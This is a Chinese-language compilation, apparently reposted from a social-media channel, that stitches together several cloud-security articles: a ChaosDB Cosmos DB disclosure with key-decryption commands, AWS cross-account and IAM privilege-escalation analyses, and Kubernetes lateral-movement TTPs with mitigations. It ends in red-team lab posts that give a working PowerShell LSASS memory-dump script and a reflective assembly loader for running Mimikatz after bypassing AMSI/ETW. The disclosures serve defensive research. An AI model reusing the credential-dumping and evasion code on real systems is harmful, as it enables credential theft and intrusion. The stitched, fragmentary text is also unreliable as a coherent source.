using Microsoft.Cis.Fabric.CertificateServices;using Microsoft.WindowsAzure.GuestAgent.CertificateManager;using Microsoft.WindowsAzure.Security.CredentialsManagement.Package;using System;using System.Collections.Generic;using System.IO;using System.Linq;using System.Security.Cryptography.X509Certificates;using System.Text;using System.Threading.Tasks;using Bond.IO;using Bond.IO.Unsafe;using RD.Security.Dsms;using Bond;using Bond.Protocols;namespace ConsoleApp2{    class Program    {        static void Main(string[] args)        {            byte[] cert = File.ReadAllBytes(@"cerificate_bond.bin");            InputBuffer input = new InputBuffer(cert);            ManagedCertificatesPackage managedCertsData = Deserialize<SecretsPackage>.From(new CompactBinaryReader<InputBuffer>(input, 1)).ManagedCertsPackage;            var managedCertData = managedCertsData.CertsData;            byte[] array = new byte[managedCertData.Count];            Array.Copy(managedCertData.Array, managedCertData.Offset, array, 0, managedCertData.Count);            byte[] data = array;            File.WriteAllBytes(@"ManagedCertsPackage.bin", data);            InputBuffer input2 = new InputBuffer(cert);            ArraySegment<byte> unmanagedCertsData = Deserialize<SecretsPackage>.From(new CompactBinaryReader<InputBuffer>(input2, 1)).UnmanagedCertsData;            var unmanagedCertData = unmanagedCertsData;            byte[] array2 = new byte[unmanagedCertData.Count];            Array.Copy(unmanagedCertData.Array, unmanagedCertData.Offset, array2, 0, unmanagedCertData.Count);            byte[] data2 = array2;            File.WriteAllBytes(@"UnmanagedCertsData.bin", data2);        }    }}

实际上，我们取回了 25 把钥匙。

是的，25 个 微软 证书及其相应的私钥。

user@laptop:~/cosmos$ grep subject ManagedCertificates.pemsubject=CN = fabricsecrets.documents.azure.comsubject=CN = secrets-kek.documents.azure.comsubject=CN = computev2.internal.by.cosmos.azure.comsubject=CN = fe.internal-secrets.by.cosmos.azure.comsubject=CN = computev2.internal.by.cosmos.azure.comsubject=CN = fabric.westus1.cosmos.azure.comsubject=CN = computev2tomanagement.internal.cosmos.azure.comsubject=CN = metricsclient.geneva.core.windows.netsubject=CN = fe.internal-secrets.by.cosmos.azure.comsubject=CN = *.notebook.cosmos.azure.comsubject=CN = metricsclient.geneva.core.windows.netsubject=CN = fabric.westus1.cosmos.azure.comsubject=CN = /certificates/selfsigned/agentidcert/crpcustomers/services/vmss/by5prdapp04_f2a6f11f-ad20-4bb3-839f-<REDACTED>_wf/by5prdapp04_f2a6f11f-ad20-4bb3-839f-<REDACTED>-by5prdapp04-f2a6f11f-ad20-4bb3-839f-<REDACTED>--/crpcustomers/services/vmss/by5prdapp04_f2a6f11f-ad20-4bb3-839f-<REDACTED>_wf/by5prdapp04_f2a6f11f-ad20-4bb3-839f-<REDACTED>--by5prdapp04.fc.core.windows.net--f2a6f11f-ad20-4bb3-839f-<REDACTED>--uswest-dsms.dsms.core.windows.netsubject=CN = *.notebook.cosmos.azure.comsubject=CN = computev2tomanagement.internal.cosmos.azure.comsubject=CN = fabric.westus1.cosmos.azure.comsubject=CN = fabricsecrets.documents.azure.comsubject=CN = secrets-kek.documents.azure.comsubject=CN = fabricsecrets.documents.azure.comsubject=CN = computev2tomanagement.internal.cosmos.azure.comsubject=CN = secrets-kek.documents.azure.comsubject=CN = *.notebook.cosmos.azure.comsubject=CN = computev2.internal.by.cosmos.azure.comsubject=CN = fe.internal-secrets.by.cosmos.azure.comsubject=CN = metricsclient.geneva.core.windows.netuser@laptop:~/cosmos$ grep subject UnmanagedCertificates.pemsubject=DC = Windows Azure CRP Certificate Generator

1. fabricsecrets.documents.azure.com

2. fabric.westus1.cosmos.azure.com

3. *.notebook.cosmos.azure.com （仅此一项就可以让我们拦截托管在

   Windows VM

   上客户

   Jupyter Notebook

   的加密

   SSL

   流量...）

这些证书的合法用途是什么？

访问存储帐户和内部服务结构

"publicSettings": {"clusterEndpoint":"https://westus.servicefabric.azure.com/runtime/clusters/83bd67e7-7bb1-4f4f-826f-<REDACTED>", ...snip... ,"certificate":{"commonNames":["fabric.westus1.cosmos.azure.com"],"x509StoreName":"My"}}

<Section Name="AzureBlobServiceFabricCrashDump"><Parameter Name="ConsumerType" Value="AzureBlobFolderUploader"/><Parameter Name="ContainerName" Value="fabriccrashdumps-83bd67e7-7bb1-4f4f-826f-<REDACTED>"/><Parameter Name="DataDeletionAgeInDays" Value="28"/><Parameter Name="IsEnabled" Value="true"/><Parameter Name="ProducerInstance" Value="ServiceFabricCrashDump"/><Parameter Name="StoreConnectionString" Value="xstore:BlobEndpoint=https://kssf2q<REDACTED>.blob.core.windows.net/;TableEndpoint=https://kssf2q<REDACTED>.table.core.windows.net/;AccountName=kssf2q<REDACTED>;ProtectedAccountKeyName=StorageAccountKey1"/></Section><Section Name="AzureBlobServiceFabricEtw"><Parameter Name="ConsumerType" Value="AzureBlobEtwCsvUploader"/><Parameter Name="ContainerName" Value="fabriclogs-83bd67e7-7bb1-4f4f-826f-<REDACTED>"/><Parameter Name="DataDeletionAgeInDays" Value="28"/><Parameter Name="IsEnabled" Value="true"/><Parameter Name="ProducerInstance" Value="ServiceFabricEtlFile"/><Parameter Name="StoreConnectionString" Value="xstore:BlobEndpoint=https://kssf2q<REDACTED>.blob.core.windows.net/;TableEndpoint=https://kssf2q<REDACTED>.table.core.windows.net/;AccountName=kssf2q<REDACTED>;ProtectedAccountKeyName=StorageAccountKey1"/></Section><Section Name="AzureBlobServiceFabricPerfCounter"><Parameter Name="ConsumerType" Value="AzureBlobFolderUploader"/><Parameter Name="ContainerName" Value="fabriccounters-83bd67e7-7bb1-4f4f-826f-<REDACTED>"/><Parameter Name="DataDeletionAgeInDays" Value="28"/><Parameter Name="IsEnabled" Value="true"/><Parameter Name="ProducerInstance" Value="ServiceFabricPerfCounter"/><Parameter Name="StoreConnectionString" Value="xstore:BlobEndpoint=https://kssf2q<REDACTED>.blob.core.windows.net/;TableEndpoint=https://kssf2q<REDACTED>.table.core.windows.net/;AccountName=kssf2q<REDACTED>;ProtectedAccountKeyName=StorageAccountKey1"/></Section><Section Name="AzureTableServiceFabricEtwQueryable"><Parameter Name="ConsumerType" Value="AzureTableQueryableEventUploader"/><Parameter Name="DataDeletionAgeInDays" Value="28"/><Parameter Name="IsEnabled" Value="true"/><Parameter Name="ProducerInstance" Value="ServiceFabricEtlFileQueryable"/><Parameter Name="StoreConnectionString" Value="xstore:BlobEndpoint=https://kssf2q<REDACTED>.blob.core.windows.net/;TableEndpoint=https://kssf2q<REDACTED>.table.core.windows.net/;AccountName=kssf2q<REDACTED>;ProtectedAccountKeyName=StorageAccountKey1"/><Parameter Name="TableNamePrefix" Value="fabriclog83bd67e77bb14f4f826f<REDACTED>"/></Section>

user@laptop:~/cosmos$ ls -latotal 144drwxr-xr-x 2 user user   4096 Aug  9 20:37 .drwxr-xr-x 3 user user   4096 Aug  9 19:53 ..-rw------- 1 user user 121900 Aug  9 18:32 ManagedCertificates.pem-rw------- 1 user user   3144 Aug  9 18:35 UnmanagedCertificates.pemuser@laptop:~/cosmos$ cat UnmanagedCertificates.pem | sed -n '/-----BEGIN PRIVATE KEY-----$/,/^-----END PRIVATE KEY-----$/p' > protected-key.pemuser@laptop:~/cosmos$ cat UnmanagedCertificates.pem | sed -n '/-----BEGIN CERTIFICATE-----$/,/^-----END CERTIFICATE-----$/p' > protected-cert.pemuser@laptop:~/cosmos$ echo MIIB0AYJKoZIhvcN...redacted...pqF8om/4fhhMgqGpu | base64 -d | openssl smime -inform DER -decrypt -recip protected-cert.pem -inkey protected-key.pem{"Placeholder":"NothingImportant"}user@laptop:~/cosmos$ echo MIICkwYJKoZIhvcN...redacted...pMd+kxSTnWwJLOwgl | base64 -d | openssl smime -inform DER -decrypt -recip protected-cert.pem -inkey protected-key.pem{"StorageAccountKey1":"55410uWV0y5X...redacted...XCUEN2upGg==","StorageAccountKey2":"kNY61/TqYr4r...redacted...KOvBat3NbQ=="}

<NodeTypeName="CV2FI02"><Endpoints><ClientConnectionEndpointPort="19000"/><LeaseDriverEndpointPort="1026"/><ClusterConnectionEndpointPort="1025"/><HttpGatewayEndpointPort="19080"Protocol="https"/><ServiceConnectionEndpointPort="1027"/><ApplicationEndpointsStartPort="20000"EndPort="30000"/><EphemeralEndpointsStartPort="30001"EndPort="65534"/></Endpoints><Certificates><ClusterCertificateX509FindType="FindBySubjectName"X509FindValue="fabric.westus1.cosmos.azure.com"Name="Certificate"/><ServerCertificateX509FindType="FindBySubjectName"X509FindValue="fabric.westus1.cosmos.azure.com"Name="Certificate"/><ClientCertificateX509FindType="FindBySubjectName"X509FindValue="fabric.westus1.cosmos.azure.com"Name="Certificate"/></Certificates><PlacementProperties><PropertyName="JanusGraphCapable"Value="true"/><PropertyName="MaterializedViewsBuilderCapable"Value="true"/><PropertyName="NodeTypeName"Value="CV2FI02"/><PropertyName="NotebookCapable"Value="true"/><PropertyName="RingRoleName"Value="CV2FI"/></PlacementProperties><Capacities><CapacityName="ComputeUnits"Value="80"/><CapacityName="ServiceFabric:/_CpuCores"Value="80"/><CapacityName="ServiceFabric:/_MemoryInMB"Value="442367"/></Capacities></NodeType></NodeTypes><Infrastructure><PaaS><Roles><RoleRoleName="CV2CB01"NodeTypeRef="CV2CB01"RoleNodeCount="5"/><RoleRoleName="CV2CW02"NodeTypeRef="CV2CW02"RoleNodeCount="7"/><RoleRoleName="CV2FI02"NodeTypeRef="CV2FI02"RoleNodeCount="8"/></Roles><Votes><VoteNodeName="_CV2FI02_0"IPAddressOrFQDN="10.0.0.4"Port="1025"/><VoteNodeName="_CV2FI02_1"IPAddressOrFQDN="10.0.0.5"Port="1025"/><VoteNodeName="_CV2FI02_2"IPAddressOrFQDN="10.0.0.6"Port="1025"/><VoteNodeName="_CV2FI02_3"IPAddressOrFQDN="10.0.0.7"Port="1025"/><VoteNodeName="_CV2FI02_4"IPAddressOrFQDN="10.0.0.8"Port="1025"/><VoteNodeName="_CV2FI02_5"IPAddressOrFQDN="10.0.0.9"Port="1025"/><VoteNodeName="_CV2FI02_6"IPAddressOrFQDN="10.0.0.10"Port="1025"/></Votes></PaaS></Infrastructure>

列出应用程序

查看执行命令的输出，我们认为这些字段特别有趣：

1. COSMOSDB_ACCOUNT_KEY_ENCRYPTED

2. NOTEBOOK_AUTH_TOKEN_ENCRYPTED

3. NOTEBOOK_STORAGE_ACCOUNT_KEY_ENCRYPTED

user@laptop:~/cosmos$ cat msg.p7mMIME-Version:1.0Content-Disposition: attachment; filename="./msg.p7m"Content-Type: application/x-pkcs7-mime; name="./msg.p7m"Content-Transfer-Encoding: base64MIICOgYJKoZIhvcNAQcDoIIC...redacted...6oYVI1iUIj9cS2K9JEQEvY1/A== // <--- COSMOSDB_ACCOUNT_KEY_ENCRYPTEDuser@laptop:~/cosmos$ openssl cms -decrypt -in msg.p7m -inkey ./fabricsecrets.documents.azure.com.key -recip ./fabricsecrets.documents.azure.com.crtEuFBNZOWMFIee...redacted...0G7W4iDZoQeCQQ== // <--- Plain-text for COSMOSDB_ACCOUNT_KEY_ENCRYPTED

影响

使用我们通过利用上述错误配置获得的信息，我们能够：

1. 获取集群中运行的任何

   Cosmos DB

   实例的明文主密钥，使我们能够在未经任何授权的情况下查询和操作客户的数据库。这可以通过使用

   fabricsecrets.documents.azure.com

   的证书解密

   COSMOSDB_ACCOUNT_KEY_ENCRYPTED

   来完成 。

3. 获取客户

   notebook

   存储账户的明文密码，使我们能够访问和操纵客户私人保存的

   notebook

   。这可以通过使用

   fabricsecrets.documents.azure.com

   的证书解密

   NOTEBOOK_STORAGE_ACCOUNT_KEY_ENCRYPTED

   ，并在

   Azure

   存储资源管理器使用

   NOTEBOOK_STORAGE_FILE_ENDPOINT

   中的信息来完成。
4. 获取

   *.notebook.cosmos.azure.com

   的证书，使我们能够拦截到这些端点的

   SSL

   流量。
5. 通过访问内部

   Azure

   存储块获取有关

   Cosmos DB

   底层基础结构的元数据。
6. 通过浏览到位于各种端点上的

   Service Fabric Explorer

   并使用

   fabric.westus1.cosmos.azure.com

   认证.

从外部访问基础设施

结论

披露时间表

• 2021 年 8 月 9 日 - Wiz 研究团队首先利用了该漏洞并获得了对 Cosmos DB 帐户的未授权访问权限。

• 2021 年 8 月 11 日 - Wiz 研究团队确认与 Wiz 客户有交集。

• 2021 年 8 月 12 日 - Wiz 研究团队向 微软 发送了咨询。

• 2021 年 8 月 14 日 - Wiz 研究团队观察到易受攻击的功能已被禁用。

• 2021 年 8 月 16 日 - 微软 安全响应中心 (MSRC) 确认报告的行为（MSRC 案例 66805）。

• 2021 年 8 月 16 日 - Wiz 研究团队观察到一些获得的证书已被撤销。

• 2021 年 8 月 17 日 - MSRC 为该报告提供了 40,000 美元的赏金。

• 2021 年 8 月 23 日 - MSRC 确认数千名客户受到影响。

• 2021 年 8 月 23 日 - MSRC 和 Wiz 研究团队讨论了公开披露策略。

• 2021 年 8 月 25 日 - 公开披露。

请点一下右下角的“在看”，谢谢！！

请帮忙点赞， 谢谢！！

请帮忙转发，谢谢！！

暗号: 125408

近年来，随着越来越多的公司迁移到云端，数据库泄露变得非常普遍，而罪魁祸首通常是客户环境中的错误配置。

窃取 Cosmos DB 客户的主键

本系列后面文章披露细节

访问 Cosmos DB 中的客户数据

现在想象一下，为 30 多个地区的数千名不同客户重复这个过程......

请点一下右下角的“在看”，谢谢！！

请帮忙点赞， 谢谢！！

请帮忙转发，谢谢！！

暗号: 922182

去年 11 月，

Wiz

机构 枚举了亚马逊云中允许从其他账户访问的所有服务，检查是否有任何服务可能无意中暴露客户，并在不同的亚马逊云服务中发现了3个漏洞，允许任何人读取或写入其他亚马逊云客户的账户。

亚马逊云 账户的隔离程度如何？

因此，去年 11 月，我们的研究团队枚举了亚马逊云中允许从其他账户访问的所有服务，以查看是否有任何服务可能会无意中暴露客户。 在短短 10 天的研究中，我们在不同的亚马逊云服务中发现了三个漏洞，允许任何人读取或写入其他亚马逊云客户的账户。

尽管黑客在现实世界中利用此漏洞会很困难，但可以对其他客户帐户执行未经授权的操作这一事实让人吃惊。这是一个新的暴露向量，可能允许黑客从高度安全的环境中泄露数据而不留下痕迹。

我们于 2020 年 11 月向亚马逊报告了这些问题，亚马逊云迅速采取行动解决了这些问题。但是，亚马逊云无法单独修复其中一个漏洞——每个易受攻击的用户都必须更新他们现有的策略。我们的研究表明， 直到今天，超过 90% 的客户仍然容易受到攻击。

此外，我们强烈怀疑更多亚马逊云的服务容易受到此类跨账户漏洞的攻击。

跨账户访问如何工作——以及如何被利用

简单地说，资源策略允许不同的亚马逊云服务相互访问。为什么这很重要？如今，大多数云客户都采用多帐户方法。他们不是在一个云帐户中管理所有操作，而是将活动划分为多个云帐户，每个帐户都有用于特定目的的特定环境。一家公司在亚马逊云中拥有数百或数千个账户是很常见的。为了使其更易于管理，客户授予亚马逊云服务访问权限以跨其多个账户执行操作。

漏洞

1. 黑客在其帐户上配置

   CloudTrail

   以将日志写入目标存储桶。所选目标存储桶位于客户帐户中。

3. 存储桶允许访问，因为

   CloudTrail

   受存储桶信任。

根本原因

这些漏洞的根本原因是亚马逊云服务可能会被诱骗代表黑客执行操作，并且目标存储桶无条件地信任该服务。

例如，截至去年 11 月，这是 亚马逊云针对S3存储桶的默认资源策略。

它允许名为无服务存储库的亚马逊云服务访问存储桶中的任何对象。问题是，它非常开放。此策略没有任何地方定义或限制谁可以使用该服务从任何给定客户的 S3 存储桶中访问信息。

简而言之，默认的亚马逊云策略是不安全的，黑客可以毫不费力地从一个账户横向到另一个账户，从而造成损害。客户从来没有机会安全地配置他们的资源策略——默认情况下他们是不安全的。

问题解决了……是吗？

值得赞扬的是，亚马逊迅速采取行动修复了漏洞，向策略添加条件,更好地限制基础资源的访问。

请点一下右下角的“在看”，谢谢！！

请帮忙点赞， 谢谢！！

请帮忙转发，谢谢！！

暗号: 729582

• 82% 的公司给第三方供应商提供高度特权的角色

• 76% 的公司存在允许完全接管帐户的第三方角色

• 超过 90% 的云安全团队并不知道他们向第三方供应商授予了高权限。

亚马逊云拥有大约 250 种不同的服务和约 9000 种不同的权限, 以至于大多数客户不了解他们向供应商提供了哪些权限。

在这里，分析一下由于权限复杂度导致的三大提权路径：

提权路径1：

iam:PutRolePolicy

不用说， 在没有适当条件和限制的情况下，绝不应将此权限授予第三方供应商 。

令人惊讶的是，供应商中有超过 10% 使用此策略，影响了很多的环境并导致关键账户接管风险。

为什么供应商请求

iam:PutRolePolicy

？

怎样才能降低风险？

提权路径2：

lambda:AddPermission

• 在帐户中找到一个高权限的

  lambda

  函数
• 使用

  lambda:AddPermission

  对原始

  IAM

  角色添加

  lambda:UpdateFunctionCode

  和

  lambda:InvokeFunction

• 将攻击代码注入原始

  lambda

• 黑客现在可以提升权限并利用提供使用该

  lambda

  的角色

为啥供应商需要这个权限

如何缓解风险

{    "Sid": "LimitAddPermission",    "Effect": "Allow",    "Action": [        "lambda:AddPermission"    ],    "Resource": "arn:aws:lambda:*:*:function:example-vendor-*",    "Condition": {        "StringEquals": {            "lambda:Principal": "s3.amazonaws.com"        }    }}

提权路径3：

ReadOnlyAccess

托管策略

为什么供应商需要

ReadOnlyAccess

如何缓解风险

请点一下右下角的“在看”，谢谢！！

请帮忙点赞， 谢谢！！

请帮忙转发，谢谢！！

暗号: 683421

云到 Kubernetes 黑客 TTP

1.IAM云密钥

然而，他们访问范围是由身份权限限制的，在这一块，不同云厂商有不同的范围：

• 亚马逊云密钥

1. 创建集群的身份，在

   EKS

   控制平台拥有

   system:masters

   权限，有所有管理权限，可以接管整个集群。
2. 其它身份，根据身份在

   ConfigMap

   的权限配置访问相应资源

• 谷歌云密钥

• Azure

  云密钥

1. 本地账户

2. 使用

   AAD

   认证的

   AAD

   集群账户

2.

kubeconfig

文件

3.容器注册中心镜像

建议的最佳实践

1. 避免在工作节点中旋转长期云密钥

2. 对外的工作节点上不能有

   kubeconfig

   文件

3. 限制对容器注册中心的访问

请点一下右下角的“在看”，谢谢！！

请帮忙点赞， 谢谢！！

请帮忙转发，谢谢！！

暗号: 600957

被忽视的风险

Kubernetes 到云的黑客 TTP

1.实例元数据服务（IMDS）

• EKS

# AmazonEKSWorkerNodePolicy{    "Version": "2012-10-17",    "Statement": [        {            "Effect": "Allow",            "Action": [                "ec2:DescribeInstances",                "ec2:DescribeInstanceTypes",                "ec2:DescribeRouteTables",                "ec2:DescribeSecurityGroups",                "ec2:DescribeSubnets",                "ec2:DescribeVolumes",                "ec2:DescribeVolumesModifications",                "ec2:DescribeVpcs",                "eks:DescribeCluster"            ],            "Resource": "*"        }    ]}

# AmazonEC2ContainerRegistryReadOnly{    "Version": "2012-10-17",    "Statement": [        {            "Effect": "Allow",            "Action": [                "ecr:GetAuthorizationToken",                "ecr:BatchCheckLayerAvailability",                "ecr:GetDownloadUrlForLayer",                "ecr:GetRepositoryPolicy",                "ecr:DescribeRepositories",                "ecr:ListImages",                "ecr:DescribeImages",                "ecr:BatchGetImage",                "ecr:GetLifecyclePolicy",                "ecr:GetLifecyclePolicyPreview",                "ecr:ListTagsForResource",                "ecr:DescribeImageScanFindings"            ],            "Resource": "*"        }    ]}

# AmazonEKS_CNI_Policy{    "Version": "2012-10-17",    "Statement": [        {            "Effect": "Allow",            "Action": [                "ec2:AssignPrivateIpAddresses",                "ec2:AttachNetworkInterface",                "ec2:CreateNetworkInterface",                "ec2:DeleteNetworkInterface",                "ec2:DescribeInstances",                "ec2:DescribeTags",                "ec2:DescribeNetworkInterfaces",                "ec2:DescribeInstanceTypes",                "ec2:DetachNetworkInterface",                "ec2:ModifyNetworkInterfaceAttribute",                "ec2:UnassignPrivateIpAddresses"            ],            "Resource": "*"        },        {            "Effect": "Allow",            "Action": [                "ec2:CreateTags"            ],            "Resource": [                "arn:aws:ec2:*:*:network-interface/*"            ]        }    ]}

• GKE

• AKS

2. Pod 的 IAM/AAD 身份

3. Kubernetes secrets/pods 中的长期云密钥

4.pod逃逸

推荐的最佳实践

1. 屏蔽 IMDS 端点

• EKS

aws ec2 modify-instance-metadata-options –instance-id <value> --http-tokens required –http-put-response-hop-limit 1

• GKE

• AKS

apiVersion: networking.k8s.io/v1kind: NetworkPolicymetadata:  name: deny-metadata-access  namespace: examplespec:  podSelector: {}  policyTypes:  - Egress  egress:  - to:    - ipBlock:        cidr: 0.0.0.0/0        except:        - 169.254.169.254/32

2.采用Pod Security Admission (PSA)

kubectl label –overwrite ns <namespace> pod-security.kubernetes.io/<mode>=<policy-type>

3.执行严格的K8s RBAC规则

4. 避免在 K8s secrets/pods 中存储长期云密钥

5.修复公开暴露的容器上的关键漏洞

6. 限制网络访问

请点一下右下角的“在看”，谢谢！！

请帮忙点赞， 谢谢！！

请帮忙转发，谢谢！！

暗号: 365955

云横向运动简介

黑客为了在环境中移动并实现其目的（例如泄露敏感数据、征用节点）往往使用横向移动来扩展网络访问权限。

背景：本地与云

在深入探讨云网络层中的不同横向移动技术之前，让我们首先回顾一下本地环境和云环境之间的一些重要区别：

身份和访问管理 (IAM)

部署和配置

可见性和风险管理

网络横向移动策略、技术和程序

通过远程服务访问主机

植入蠕虫

冒充有效账户

通过 VPC 对等互连

发现 IaaS/PaaS 数据库

利用漏洞和错误配置

大多数云环境都容易受到横向移动的影响

我们的研究结果表明，大约 58% 的云环境至少有一个公开暴露的节点，其中存储了明文长期云密钥，而大约 35% 的云环境至少有一个公开暴露的节点，其中存储有明文

SSH

私钥。

可以看出，这些数字反映出许多组织的云环境中缺乏针对横向移动攻击的充分防御。

推荐的最佳实践

以下5 个关键网络最佳实践, 任何组织都应在其云环境中实施以降低横向移动攻击风险：

1. 实施严格的防火墙（安全组和

   ACL

   ）

2. 去除明文云和私钥

3. 修复关键漏洞

4. 隔离你的环境

5. 采用私有链接

请点一下右下角的“在看”，谢谢！！

请帮忙点赞， 谢谢！！

请帮忙转发，谢谢！！

暗号: 054312

环境

• 带有 Ubuntu Linux AMI 的 AWS EC2 作为攻击者 C2 服务器。

• 带有 Windows Server 2019 AMI 的 AWS EC2 作为受害者机器。

• 安装 Visual Studio 2022 社区的本地 Windows 10 计算机用于恶意软件开发和编译

• 本地 Kali Linux 攻击机。

过程

# lsaKiller.ps1Add-Type @"    using System;    using System.Runtime.InteropServices;    public class MiniDump {        [DllImport("Dbghelp.dll", SetLastError=true)]        public static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);    }"@$PROCESS_QUERY_INFORMATION = 0x0400$PROCESS_VM_READ = 0x0010$MiniDumpWithFullMemory = 0x00000002Add-Type -TypeDefinition @"    using System;    using System.Runtime.InteropServices;    public class Kernel32 {        [DllImport("kernel32.dll", SetLastError=true)]        public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);        [DllImport("kernel32.dll", SetLastError=true)]        public static extern bool CloseHandle(IntPtr hObject);    }"@$processId ="788"$processHandle = [Kernel32]::OpenProcess($PROCESS_QUERY_INFORMATION -bor $PROCESS_VM_READ, $false, $processId)if ($processHandle -ne [IntPtr]::Zero) {    $dumpFile = [System.IO.File]::Create("C:\users\public\test1234.txt")    $fileHandle = $dumpFile.SafeFileHandle.DangerousGetHandle()    $result = [MiniDump]::MiniDumpWriteDump($processHandle, $processId, $fileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)    if ($result) {        Write-Host "Sucess"    } else {        Write-Host "Failed" -ForegroundColor Red    }    $dumpFile.Close()    [Kernel32]::CloseHandle($processHandle)} else {    Write-Host "Failed to open process handle." -ForegroundColor Red}

• 执行

  LSASS

  转储

• 使用

  impacket-smbclient

  下载转储

• 使用

  pypykatz

  在本地解析

  MiniDump

  文件

请点一下右下角的“在看”，谢谢！！

请帮忙点赞， 谢谢！！

请帮忙转发，谢谢！！

暗号: 054216

环境

• 带有 Ubuntu Linux AMI 的 AWS EC2 作为攻击者 C2 服务器。

• 带有 Windows Server 2019 AMI 的 AWS EC2 作为受害者机器。

• 安装 Visual Studio 2022 社区的本地 Windows 10 计算机用于恶意软件开发和编译

• 本地 Kali Linux 攻击机。

过程

脚本的一般结构如下：

function Invoke-YourTool{    $a=New-Object IO.MemoryStream(,[Convert]::FromBAsE64String("yourbase64stringhere"))    $decompressed = New-Object IO.Compression.GzipStream($a,[IO.Compression.CoMPressionMode]::DEComPress)    $output = New-Object System.IO.MemoryStream    $decompressed.CopyTo( $output )    [byte[]] $byteOutArray = $output.ToArray()    $RAS = [System.Reflection.Assembly]::Load($byteOutArray)    $OldConsoleOut = [Console]::Out    $StringWriter = New-Object IO.StringWriter    [Console]::SetOut($StringWriter)    [ClassName.Program]::main([string[]]$args)    [Console]::SetOut($OldConsoleOut)    $Results = $StringWriter.ToString()    $Results  }

因此，可以执行以下杀伤链来执行任何二进制文件：

• 补丁 AMSI/ETW。

• 反射加载并执行程序集。

反射加载 Mimikatz

请点一下右下角的“在看”，谢谢！！

请帮忙点赞， 谢谢！！

请帮忙转发，谢谢！！

暗号: 048160